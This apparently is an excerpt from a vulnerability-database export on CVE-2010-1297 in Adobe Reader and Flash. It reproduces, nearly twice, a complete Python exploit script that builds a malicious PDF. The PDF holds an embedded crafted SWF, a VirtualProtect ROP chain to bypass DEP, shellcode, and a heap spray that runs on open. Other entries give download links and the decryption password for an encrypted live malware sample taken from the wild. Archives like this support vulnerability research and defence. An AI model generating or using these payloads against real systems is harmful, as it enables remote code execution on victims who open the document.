self.eol\n\t\t\n\tdef obj(self, obj_num, data,flag):\n\t\tself.xrefs.append(len(self.content))\n\t\tself.content += '%d 0 obj' % obj_num\n\t\tif flag == 1:\n\t\t\tself.content += self.eol + '<< ' + data + ' >>' + self.eol\n\t\telse:\n\t\t\tself.content += self.eol + data + self.eol\n\t\tself.content += 'endobj' + self.eol\n\n\tdef obj_SWFStream(self, obj_num, data, stream):\n\t\tself.xrefs.append(len(self.content))\n\t\tself.content += '%d 0 obj' % obj_num\n\t\tself.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))\n\t\tself.content += ' >>' + self.eol\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\n\t\tself.content += 'endobj' + self.eol\n\t\n\tdef obj_Stream(self, obj_num, data, stream):\n\t\tself.xrefs.append(len(self.content))\n\t\tself.content += '%d 0 obj' % obj_num\n\t\tself.content += self.eol + '<< ' + data + '/Length %d' %len(stream)\n\t\tself.content += ' >>' + self.eol\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\n\t\tself.content += 'endobj' + self.eol\n\t\t\n\tdef ref(self, ref_num):\n\t\treturn '%d 0 R' % ref_num\n\t\t\n\tdef xref(self):\n\t\tself.xrefs_offset = len(self.content)\n\t\tself.content += 'xref' + self.eol\n\t\tself.content += '0 %d' % (len(self.xrefs) + 1)\n\t\tself.content += self.eol\n\t\tself.content += '0000000000 65535 f' + self.eol\n\t\tfor i in self.xrefs:\n\t\t\tself.content += '%010d 00000 n' % i\n\t\t\tself.content += self.eol\n \n\tdef trailer(self):\n\t\tself.content += 'trailer' + self.eol\n\t\tself.content += '<< /Size %d' % (len(self.xrefs) + 1)\n\t\tself.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\n\t\tself.content += 'startxref' + self.eol\n\t\tself.content += '%d' % self.xrefs_offset\n\t\tself.content += self.eol\n\t\tself.content += '%%EOF'\n\t\t\n\tdef generate(self):\n\t\treturn self.content\n\n\n\t\t\n\t\t\nclass Exploit:\n \n def convert_to_utf16(self, payload):\n enc_payload = ''\n for i in range(0, len(payload), 2):\n num = 0\n for j in range(0, 2):\n num += (ord(payload[i + j]) & 0xff) << (j * 8)\n enc_payload += '%%u%04x' % num\n return enc_payload\n \n def get_payload(self): \t\n # shellcode calc.exe\n payload =(\"\\x90\\x90\\x90\\x89\\xE5\\xD9\\xEE\\xD9\\x75\\xF4\\x5E\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\n\t \"\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5A\\x6A\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6B\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\"\n\t\t \"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4A\\x49\\x4B\\x4C\\x4B\\x58\\x51\\x54\\x43\\x30\\x43\\x30\\x45\\x50\\x4C\\x4B\\x51\\x55\\x47\\x4C\\x4C\\x4B\\x43\\x4C\"\n\t\t \"\\x43\\x35\\x44\\x38\\x45\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x44\\x58\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x45\\x51\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\"\n\t\t \"\\x4B\\x43\\x31\\x4A\\x4E\\x46\\x51\\x49\\x50\\x4A\\x39\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x42\\x54\\x45\\x57\\x49\\x51\\x48\\x4A\\x44\\x4D\\x45\\x51\\x49\\x52\"\n\t\t \"\\x4A\\x4B\\x4B\\x44\\x47\\x4B\\x46\\x34\\x46\\x44\\x45\\x54\\x43\\x45\\x4A\\x45\\x4C\\x4B\\x51\\x4F\\x47\\x54\\x43\\x31\\x4A\\x4B\\x43\\x56\\x4C\\x4B\\x44\"\n\t\t \"\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C\\x4C\\x4B\\x43\\x31\\x4A\\x4B\\x4C\\x49\\x51\\x4C\\x47\\x54\\x45\\x54\"\n\t\t \"\\x48\\x43\\x51\\x4F\\x46\\x51\\x4C\\x36\\x43\\x50\\x46\\x36\\x45\\x34\\x4C\\x4B\\x50\\x46\\x50\\x30\\x4C\\x4B\\x47\\x30\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45\"\n\t\t \"\\x4C\\x4E\\x4D\\x4C\\x4B\\x42\\x48\\x44\\x48\\x4D\\x59\\x4B\\x48\\x4B\\x33\\x49\\x50\\x43\\x5A\\x46\\x30\\x45\\x38\\x4C\\x30\\x4C\\x4A\\x45\\x54\\x51\\x4F\"\n\t\t \"\\x42\\x48\\x4D\\x48\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x50\\x57\\x4B\\x4F\\x4A\\x47\\x43\\x53\\x47\\x4A\\x51\\x4C\\x50\\x57\\x51\\x59\\x50\\x4E\\x50\\x44\\x50\"\n\t\t \"\\x4F\\x46\\x37\\x50\\x53\\x51\\x4C\\x43\\x43\\x42\\x59\\x44\\x33\\x43\\x44\\x43\\x55\\x42\\x4D\\x50\\x33\\x50\\x32\\x51\\x4C\\x42\\x43\\x45\\x31\\x42\\x4C\"\n\t\t \"\\x42\\x43\\x46\\x4E\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x41\\x41\")\n return payload\n\n\n def getSWF(self):\n try:\n #swfFile = sys.argv[2]\n fdR = open('flash.swf', 'rb+')\n strTotal = fdR.read()\n str1 = strTotal[:88]\n addr1 = '\\x06\\xa6\\x17\\x30' # addr = 0c0c0c0c\t\t\t\n str2 = strTotal[92:533]\n\t\t\t#*************************** Bypass DEP by VirtualProtect ********************************\n rop = ''\n rop += \"\\x77\\xFA\\x44\\x7E\" # mov edi,esp ret 4\n rop += \"\\x94\\x28\\xc2\\x77\"\t #add esp,20 pop ebp ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xD4\\x1A\\x80\\x7C\" # VirtualProtect\n rop += \"BBBB\"\t\t\t # Ret Addr for VirtualProtect\n rop += \"CCCC\"\t\t\t # Param1\t(lpAddress)\n rop += \"DDDD\"\t\t\t # Param2\t(Size)\n rop += \"EEEE\"\t\t\t # Param3\t(flNewProtect)\n rop += \"\\x10\\xB0\\xEF\\x77\" # Param4 (Writable Address)\n rop += \"AAAAAAAAAAAA\"\t\t #padding\n rop += \"\\xC2\\x4D\\xC3\\x77\"\t #mov eax,edi pop esi ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xF2\\xE1\\x12\\x06\"\t #add eax,94 ret\n rop += \"\\x70\\xDC\\xEE\\x77\" #push esp pop ebp ret4\n rop += \"\\x16\\x9A\\x94\\x7C\"\t #mov [ebp-30],eax ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xF2\\xE1\\x12\\x06\"\t #add eax,94 ret\n rop += \"\\x79\\x9E\\x83\\x7C\"\t #mov [ebp-2c],eax ret\n rop += \"\\x27\\x56\\xEA\\x77\"\t #mov eax,6b3 ret\n rop += \"\\x14\\x83\\xE0\\x77\"\t #mov [ebp-28],eax ret\n rop += \"\\xB4\\x01\\xF2\\x77\"\t #xor eax,eax ret\n rop += \"\\x88\\x41\\x97\\x7C\"\t #add eax,40 pop ebp ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\x70\\xDC\\xEE\\x77\"\t #push esp pop ebp ret4\n rop += \"\\xC0\\x9E\\xEF\\x77\"\t #mov [ebp-54],eax ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xC2\\x4D\\xC3\\x77\"\t #mov eax,edi pop esi ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xC1\\xF2\\xC1\\x77\"\t #add eax,8 ret\n rop += \"\\xCF\\x97\\xDE\\x77\"\t #xchg eax,esp ret\n\t\t\t\n str3 = strTotal[669:1249]\n alignESP = \"\\x83\\xc4\\x03\"\n sc = self.get_payload()\n\t\t\t\n if len(sc) > 2118:\n print \"[*] Error : payload length is long\"\n return\n if len(sc) <= 2118:\n dif = 2118 - len(sc)\n while dif > 0 :\n sc += '\\x90'\n dif = dif - 1\n\t\t\t\n str4 = strTotal[3370:3726]\n\t\t\t\n addr2 = '\\xF2\\x3D\\x8D\\x23' # Enter 0C75 , 81 RET\t\n\t\t\t\n str5 = strTotal[3730:]\n\t\t\t\n fdW= open('exploit.swf', 'wb+')\n finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5\n fdW.write(finalStr)\t\n \t\t\n #strTotal = open('exploit.swf', 'rb+').read()\n fdW.close()\n fdR.close()\n return finalStr\n \n except IOError:\n print '[*] Error : An IO error has occurred'\n\t\t\n def HeapSpray(self):\n spray = '''\t\n function spray_heap()\n {\n var chunk_size, payload, nopsled;\n \n chunk_size = 0x1A0000;\n pointers = unescape(\"%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030\");\n pointerSled = unescape(\"<Contents>\");\n while (pointerSled.length < chunk_size)\n pointerSled += pointerSled;\n pointerSled_len = chunk_size - (pointers.length + 20); \n pointerSled = pointerSled.substring(0, pointerSled_len);\n heap_chunks = new Array();\n for (var i = 0 ; i < <CHUNKS> ; i++)\n heap_chunks[i] = pointerSled + pointers;\n } \n \n \n spray_heap(); \n '''\n\t\t\n spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX\n '''\nAuthplay.dll\n\t\t\n303033DD ? 87DC XCHG ESP,EBX\n\n#############################################################\n\t\t\t\t\t will do nothing\t\n\n303033DF ? 45 INC EBP\n303033E0 ? 05 00898784 ADD EAX,84878900 \n303033E5 ? 42 INC EDX\n303033E6 ? 05 008987E8 ADD EAX,E8878900\n303033EB ? 41 INC ECX\n303033EC ? 05 008987EC ADD EAX,EC878900\n303033F1 ? 41 INC ECX\n303033F2 ? 05 008987F0 ADD EAX,F0878900\n303033F7 ? 41 INC ECX\n303033F8 ? 05 008987F4 ADD EAX,F4878900\n303033FD ? 41 INC ECX\n303033FE ? 05 005F5E5D ADD EAX,5D5E5F00\n30303403 . B8 01000000 MOV EAX,1\n30303408 . 5B POP EBX\n############################################################\n\n30303409 . 83C4 30 ADD ESP,30\n3030340C . C3 RETN\n\n '''\n\n spray = spray.replace('<CHUNKS>', '40') #Chunk count\n return spray\n\t\t\ndef generate_pdf():\n\texploit = Exploit()\n\tswfFile = 'exploit.swf'\n\tpdf = PDF()\n\tpdf.header()\n\tpdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)\n\t#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)\n\tpdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)\n\tpdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + \" /Type/Page\"+' /Contents '+pdf.ref(4) ,1)\n\tpdf.obj_Stream(4, '','')\n\tpdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)\n\tpdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) \n\tpdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)\n\tpdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)\t\n\tpdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)\t\n\tpdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)\t\n\tpdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)\t\n\tpdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)\t\n\tpdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)\n\tpdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) \n\tpdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)\n\tpdf.obj_Stream(16, '<</Length 0 >> ','') \n\tpdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) \n\t\n\tpdf.xref()\n\tpdf.trailer()\n\treturn pdf.generate()\n\t\ndef main():\n\tif len(sys.argv) != 2:\n\t\tprint 'Usage: python %s [output file name]' % sys.argv[0]\n\t\tsys.exit(0)\n\tfile_name = sys.argv[1]\n\tif not file_name.endswith('.pdf'):\n\t\tfile_name = file_name + '.pdf'\n\ttry:\n\t\tfd = open(file_name, 'wb+')\n\t\tfd.write(generate_pdf())\n\t\tfd.close()\n\t\tprint '[-] PDF file generated and written to %s' % file_name\n\texcept IOError:\n\t\tprint '[*] Error : An IO error has occurred'\n\t\tprint '[-] Exiting ...'\n\t\tsys.exit(-1)\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash Reader - Live Malware", "edition": 1, "published": "2010-06-09T00:00:00", "title": "Adobe Flash Reader - Live Malware", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-09T00:00:00", "id": "EXPLOITPACK:8E576C4816C791FE420A43AC52B86332", "href": "", "sourceData": "# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\n\n# File is malicious! Taken from the wild! Beware!\n# To decrypt the file:\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\n# Password is \"edb\" without the quotes.\n\nNOTE: This was taken out of live malware and was not modified. BEWARE.\n\nBy visiting the following link, you agree that you are responsible for any damages that occur.\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:10:38", "description": "No description provided by source.", "published": "2010-06-09T00:00:00", "type": "seebug", "title": "0day Exploit for Adobe Flash and Reader PoC (from the wild)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19759", "id": "SSV:19759", "sourceData": "\n Download: N/A\r\nview source\r\nprint?\r\n# EDB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\r\n# File is malicious! Taken from the wild! Beware!\r\n# To decrypt the file:\r\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\r\n# Password is "edb" without the quotes.\r\n \r\nNOTE: This was taken out of live malware and was not modified. BEWARE.\r\n \r\nBy visiting the following link, you agree that you are responsible for any damages that occur.\r\n \r\nhttp://exploit-db.com/sploits/adobe-0day-2010-1297.tar.enc\r\nhttp://sebug.net/paper/Exploits-Archives/2010-exploits/1006-exploits/adobe-0day-2010-1297.tar.enc\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19759", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:21:19", "description": "No description provided by source.", "published": "2014-07-02T00:00:00", "type": "seebug", "title": "Adobe Acrobat Reader and Flash Player - \u201cnewclass\u201d invalid pointer", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87100", "id": "SSV:87100", "sourceData": "\n '''\r\n __ __ ____ _ _ ____ \r\n | \\/ |/ __ \\ /\\ | | | | _ \\ \r\n | \\ / | | | | / \\ | | | | |_) |\r\n | |\\/| | | | |/ /\\ \\| | | | _ < Day 1 (Binary Analysis)\r\n | | | | |__| / ____ \\ |__| | |_) |\r\n |_| |_|\\____/_/ \\_\\____/|____/ \r\n\r\nhttp://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/\r\nhttp://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz\r\n\r\n Title : Adobe Acrobat Reader and Flash Player \u201cnewclass\u201d invalid pointer vulnerability\r\n Analysis : http://www.abysssec.com\r\n Vendor : http://www.adobe.com\r\n Impact : Ciritical\r\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\r\n Twitter : @abysssec\r\n CVE : CVE-2010-1297\r\n MOAUB Number : MOAUB-01-BA\r\n'''\r\n\r\nimport sys\r\n\r\nclass PDF:\r\n \r\n\tdef __init__(self):\r\n\t\tself.xrefs = []\r\n\t\tself.eol = '\\x0a'\r\n\t\tself.content = ''\r\n\t\tself.xrefs_offset = 0\r\n\t\t\r\n\tdef header(self):\r\n\t\tself.content += '%PDF-1.6' + self.eol\r\n\t\t\r\n\tdef obj(self, obj_num, data,flag):\r\n\t\tself.xrefs.append(len(self.content))\r\n\t\tself.content += '%d 0 obj' % obj_num\r\n\t\tif flag == 1:\r\n\t\t\tself.content += self.eol + '<< ' + data + ' >>' + self.eol\r\n\t\telse:\r\n\t\t\tself.content += self.eol + data + self.eol\r\n\t\tself.content += 'endobj' + self.eol\r\n\r\n\tdef obj_SWFStream(self, obj_num, data, stream):\r\n\t\tself.xrefs.append(len(self.content))\r\n\t\tself.content += '%d 0 obj' % obj_num\r\n\t\tself.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))\r\n\t\tself.content += ' >>' + self.eol\r\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\r\n\t\tself.content += 'endobj' + self.eol\r\n\t\r\n\tdef obj_Stream(self, obj_num, data, stream):\r\n\t\tself.xrefs.append(len(self.content))\r\n\t\tself.content += '%d 0 obj' % obj_num\r\n\t\tself.content += self.eol + '<< ' + data + '/Length %d' %len(stream)\r\n\t\tself.content += ' >>' + self.eol\r\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\r\n\t\tself.content += 'endobj' + self.eol\r\n\t\t\r\n\tdef ref(self, ref_num):\r\n\t\treturn '%d 0 R' % ref_num\r\n\t\t\r\n\tdef xref(self):\r\n\t\tself.xrefs_offset = len(self.content)\r\n\t\tself.content += 'xref' + self.eol\r\n\t\tself.content += '0 %d' % (len(self.xrefs) + 1)\r\n\t\tself.content += self.eol\r\n\t\tself.content += '0000000000 65535 f' + self.eol\r\n\t\tfor i in self.xrefs:\r\n\t\t\tself.content += '%010d 00000 n' % i\r\n\t\t\tself.content += self.eol\r\n \r\n\tdef trailer(self):\r\n\t\tself.content += 'trailer' + self.eol\r\n\t\tself.content += '<< /Size %d' % (len(self.xrefs) + 1)\r\n\t\tself.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\r\n\t\tself.content += 'startxref' + self.eol\r\n\t\tself.content += '%d' % self.xrefs_offset\r\n\t\tself.content += self.eol\r\n\t\tself.content += '%%EOF'\r\n\t\t\r\n\tdef generate(self):\r\n\t\treturn self.content\r\n\r\n\r\n\t\t\r\n\t\t\r\nclass Exploit:\r\n \r\n def convert_to_utf16(self, payload):\r\n enc_payload = ''\r\n for i in range(0, len(payload), 2):\r\n num = 0\r\n for j in range(0, 2):\r\n num += (ord(payload[i + j]) & 0xff) << (j * 8)\r\n enc_payload += '%%u%04x' % num\r\n return enc_payload\r\n \r\n def get_payload(self): \t\r\n # shellcode calc.exe\r\n payload =("\\x90\\x90\\x90\\x89\\xE5\\xD9\\xEE\\xD9\\x75\\xF4\\x5E\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49"\r\n\t "\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5A\\x6A\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6B\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41"\r\n\t\t "\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4A\\x49\\x4B\\x4C\\x4B\\x58\\x51\\x54\\x43\\x30\\x43\\x30\\x45\\x50\\x4C\\x4B\\x51\\x55\\x47\\x4C\\x4C\\x4B\\x43\\x4C"\r\n\t\t "\\x43\\x35\\x44\\x38\\x45\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x44\\x58\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x45\\x51\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C"\r\n\t\t "\\x4B\\x43\\x31\\x4A\\x4E\\x46\\x51\\x49\\x50\\x4A\\x39\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x42\\x54\\x45\\x57\\x49\\x51\\x48\\x4A\\x44\\x4D\\x45\\x51\\x49\\x52"\r\n\t\t "\\x4A\\x4B\\x4B\\x44\\x47\\x4B\\x46\\x34\\x46\\x44\\x45\\x54\\x43\\x45\\x4A\\x45\\x4C\\x4B\\x51\\x4F\\x47\\x54\\x43\\x31\\x4A\\x4B\\x43\\x56\\x4C\\x4B\\x44"\r\n\t\t "\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C\\x4C\\x4B\\x43\\x31\\x4A\\x4B\\x4C\\x49\\x51\\x4C\\x47\\x54\\x45\\x54"\r\n\t\t "\\x48\\x43\\x51\\x4F\\x46\\x51\\x4C\\x36\\x43\\x50\\x46\\x36\\x45\\x34\\x4C\\x4B\\x50\\x46\\x50\\x30\\x4C\\x4B\\x47\\x30\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45"\r\n\t\t "\\x4C\\x4E\\x4D\\x4C\\x4B\\x42\\x48\\x44\\x48\\x4D\\x59\\x4B\\x48\\x4B\\x33\\x49\\x50\\x43\\x5A\\x46\\x30\\x45\\x38\\x4C\\x30\\x4C\\x4A\\x45\\x54\\x51\\x4F"\r\n\t\t "\\x42\\x48\\x4D\\x48\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x50\\x57\\x4B\\x4F\\x4A\\x47\\x43\\x53\\x47\\x4A\\x51\\x4C\\x50\\x57\\x51\\x59\\x50\\x4E\\x50\\x44\\x50"\r\n\t\t "\\x4F\\x46\\x37\\x50\\x53\\x51\\x4C\\x43\\x43\\x42\\x59\\x44\\x33\\x43\\x44\\x43\\x55\\x42\\x4D\\x50\\x33\\x50\\x32\\x51\\x4C\\x42\\x43\\x45\\x31\\x42\\x4C"\r\n\t\t "\\x42\\x43\\x46\\x4E\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x41\\x41")\r\n return payload\r\n\r\n\r\n def getSWF(self):\r\n try:\r\n #swfFile = sys.argv[2]\r\n fdR = open('flash.swf', 'rb+')\r\n strTotal = fdR.read()\r\n str1 = strTotal[:88]\r\n addr1 = '\\x06\\xa6\\x17\\x30' # addr = 0c0c0c0c\t\t\t\r\n str2 = strTotal[92:533]\r\n\t\t\t#*************************** Bypass DEP by VirtualProtect ********************************\r\n rop = ''\r\n rop += "\\x77\\xFA\\x44\\x7E" # mov edi,esp ret 4\r\n rop += "\\x94\\x28\\xc2\\x77"\t #add esp,20 pop ebp ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xD4\\x1A\\x80\\x7C" # VirtualProtect\r\n rop += "BBBB"\t\t\t # Ret Addr for VirtualProtect\r\n rop += "CCCC"\t\t\t # Param1\t(lpAddress)\r\n rop += "DDDD"\t\t\t # Param2\t(Size)\r\n rop += "EEEE"\t\t\t # Param3\t(flNewProtect)\r\n rop += "\\x10\\xB0\\xEF\\x77" # Param4 (Writable Address)\r\n rop += "AAAAAAAAAAAA"\t\t #padding\r\n rop += "\\xC2\\x4D\\xC3\\x77"\t #mov eax,edi pop esi ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xF2\\xE1\\x12\\x06"\t #add eax,94 ret\r\n rop += "\\x70\\xDC\\xEE\\x77" #push esp pop ebp ret4\r\n rop += "\\x16\\x9A\\x94\\x7C"\t #mov [ebp-30],eax ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xC2\\x4D\\xC3\\x77" #mov eax,edi pop esi ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xF2\\xE1\\x12\\x06"\t #add eax,94 ret\r\n rop += "\\x79\\x9E\\x83\\x7C"\t #mov [ebp-2c],eax ret\r\n rop += "\\x27\\x56\\xEA\\x77"\t #mov eax,6b3 ret\r\n rop += "\\x14\\x83\\xE0\\x77"\t #mov [ebp-28],eax ret\r\n rop += "\\xB4\\x01\\xF2\\x77"\t #xor eax,eax ret\r\n rop += "\\x88\\x41\\x97\\x7C"\t #add eax,40 pop ebp ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\x70\\xDC\\xEE\\x77"\t #push esp pop ebp ret4\r\n rop += "\\xC0\\x9E\\xEF\\x77"\t #mov [ebp-54],eax ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xC2\\x4D\\xC3\\x77"\t #mov eax,edi pop esi ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xC1\\xF2\\xC1\\x77"\t #add eax,8 ret\r\n rop += "\\xCF\\x97\\xDE\\x77"\t #xchg eax,esp ret\r\n\t\t\t\r\n str3 = strTotal[669:1249]\r\n alignESP = "\\x83\\xc4\\x03"\r\n sc = self.get_payload()\r\n\t\t\t\r\n if len(sc) > 2118:\r\n print "[*] Error : payload length is long"\r\n return\r\n if len(sc) <= 2118:\r\n dif = 2118 - len(sc)\r\n while dif > 0 :\r\n sc += '\\x90'\r\n dif = dif - 1\r\n\t\t\t\r\n str4 = strTotal[3370:3726]\r\n\t\t\t\r\n addr2 = '\\xF2\\x3D\\x8D\\x23' # Enter 0C75 , 81 RET\t\r\n\t\t\t\r\n str5 = strTotal[3730:]\r\n\t\t\t\r\n fdW= open('exploit.swf', 'wb+')\r\n finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5\r\n fdW.write(finalStr)\t\r\n \t\t\r\n #strTotal = open('exploit.swf', 'rb+').read()\r\n fdW.close()\r\n fdR.close()\r\n return finalStr\r\n \r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n\t\t\r\n def HeapSpray(self):\r\n spray = '''\t\r\n function spray_heap()\r\n {\r\n var chunk_size, payload, nopsled;\r\n \r\n chunk_size = 0x1A0000;\r\n pointers = 